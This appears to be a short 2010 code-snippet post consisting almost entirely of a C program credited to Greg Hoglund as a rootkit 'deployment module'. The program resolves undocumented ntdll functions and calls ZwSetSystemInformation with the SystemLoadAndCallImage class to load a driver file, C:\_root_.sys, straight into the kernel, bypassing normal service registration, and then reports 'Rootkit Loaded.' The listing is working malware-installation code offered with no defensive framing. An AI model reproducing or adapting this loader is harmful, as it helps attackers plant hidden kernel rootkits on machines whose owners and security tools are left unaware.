Loading a driver with the SystemLoadAndCallImage class of ZwSetSystemInformation
2010-03-19 11:05
821 views
```c
////////////////////////////////////////
// New Deployment Module for rootkit 040
// -------------------------------------
// -Greg Hoglund http://www.rootkit.com
////////////////////////////////////////
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* exit() */

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

/* NTSTATUS is a signed 32-bit value: success codes are >= 0, error codes
   have the high bit set. Declaring it unsigned (as the original listing did)
   makes NT_SUCCESS() always true, so the failure branch below was unreachable. */
typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

/* ntdll.dll exports resolved at run time; they are not in the public SDK headers */
NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

/* Input buffer for the SystemLoadAndCallImage class: only the NT path of the image */
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

#define SystemLoadAndCallImage 38

int main(void)
{
    ///////////////////////////////////////////////////////////////
    // Why mess with Drivers?
    ///////////////////////////////////////////////////////////////
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    WCHAR daPath[] = L"\\??\\C:\\_root_.sys";

    //////////////////////////////////////////////////////////////
    // get DLL entry points
    //////////////////////////////////////////////////////////////
    if( !(RtlInitUnicodeString = (void *) GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString" )) )
        exit(1);

    if( !(ZwSetSystemInformation = (void *) GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "ZwSetSystemInformation" )) )
        exit(1);

    RtlInitUnicodeString( &(GregsImage.ModuleName), daPath );

    if( NT_SUCCESS( ZwSetSystemInformation(
            SystemLoadAndCallImage,
            &GregsImage,
            sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ) )
    {
        printf("Rootkit Loaded.\n");
    }
    else
    {
        printf("Rootkit not loaded.\n");
    }
    return 0;
}
```